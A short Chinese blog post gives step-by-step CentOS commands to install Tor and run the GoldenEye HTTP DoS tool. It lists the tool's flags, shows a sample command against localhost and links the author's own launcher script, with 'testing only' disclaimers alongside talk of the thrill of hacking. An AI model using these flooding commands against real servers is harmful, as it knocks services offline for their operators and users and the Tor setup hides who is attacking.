joshua-fuller-229095

每天都会收到阿里云推送的短信,说服务器被攻击了。突生想法,自己试试来对自己服务器做压力测试。到 GitHub 搜了一圈,发现了一个叫 GoldenEye 的项目。和大家分享一下,体验一把当 Hacker 的瘾。不过只会 DOS 攻击的是伪 Hacker ,粗鲁霸道,想要成为一名真正的 Hacker 还是要深入学习。

GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!

GoldenEye is a HTTP DoS Test Tool.

Attack Vector exploited: HTTP Keep Alive + NoCache

该项目只用于 DOS 测试,请勿作他用!

测试环境: Centos 7.2
具体步骤如下:

yum install git wget -y
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-9.noarch.rpm
rpm -ivh epel-release-7-9.noarch.rpm
yum install tor -y
git clone https://github.com/jseidl/GoldenEye.git
cd GoldenEye
chmod +x goldeneye.py 
service tor start
./goldeneye.py [OPTIONS] 

用法也很简单

USAGE: ./goldeneye.py <url> [OPTIONS]
OPTIONS:

Flag Description  Default
-u, –useragents File with user-agents to use (default: randomly generated)
-w, –workers Number of concurrent workers (default: 50)
-s, –sockets Number of concurrent sockets (default: 30)
-m, –method HTTP Method to use ‘get’ or ‘post’  or ‘random’ (default: get)
-d, –debug Enable Debug Mode [more verbose output] (default: False)
-h, –help Shows this help

“Strikes Deffered” variable saying what number of strikes was blocked or crashed. In brackets says what number of connection timed out was responded (or responded error 500).

示范:./goldeneye.py https://127.0.0.1 -w 200 -s 100

开始测试之后,注意 Strikes Deffered 提示,这个代表了攻击阻碍或崩溃的数量。圆括号里的数字则表示链接超时或者 error 500 的数量。

我写了一个蹩脚的脚本供 Centos7 使用,详见:https://github.com/zyl6698/Goldendos
用法:

git clone https://github.com/zyl6698/Goldendos && cd Goldendos
chmod +x hack1.0.sh
./hack1.0.sh

食用愉快!
在树莓派上同样运行成功,有设备的同学可以尝试一下。
再次申明:该项目只能用于学习测试,不能用于其他!